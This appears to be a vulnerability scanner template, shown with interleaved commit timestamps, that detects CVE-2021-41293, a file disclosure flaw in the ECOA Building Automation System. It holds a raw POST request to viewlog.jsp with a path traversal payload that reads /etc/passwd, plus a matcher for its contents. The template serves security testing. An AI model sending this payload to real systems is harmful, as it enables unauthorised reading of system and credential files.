2021-10-14 14:35:25 +00:00
id : CVE-2021-41293
2021-09-16 17:44:04 +00:00
info :
2021-09-17 11:09:09 +00:00
name : ECOA Building Automation System - LFD
2021-09-16 17:44:04 +00:00
author : 0x_Akoko
2021-09-14 22:02:57 +00:00
severity : high
2021-10-14 13:29:51 +00:00
description : The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
2021-10-14 13:30:44 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
2021-10-14 14:35:25 +00:00
tags : cve,cve2021,ecoa,lfi
2021-10-14 14:37:07 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2021-41293
cwe-id : CWE-22
2021-09-14 22:02:57 +00:00
requests :
- raw :
- |
POST /viewlog.jsp HTTP/1.1
Host : {{Hostname}}
2021-09-14 22:24:11 +00:00
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
2021-09-17 11:09:09 +00:00
matchers-condition : and
2021-09-14 22:24:11 +00:00
matchers :
2021-09-17 11:09:09 +00:00
2021-09-14 22:02:57 +00:00
- type : regex
regex :
2021-09-17 11:09:09 +00:00
- "root:.*:0:0"
- type : status
status :
- 200
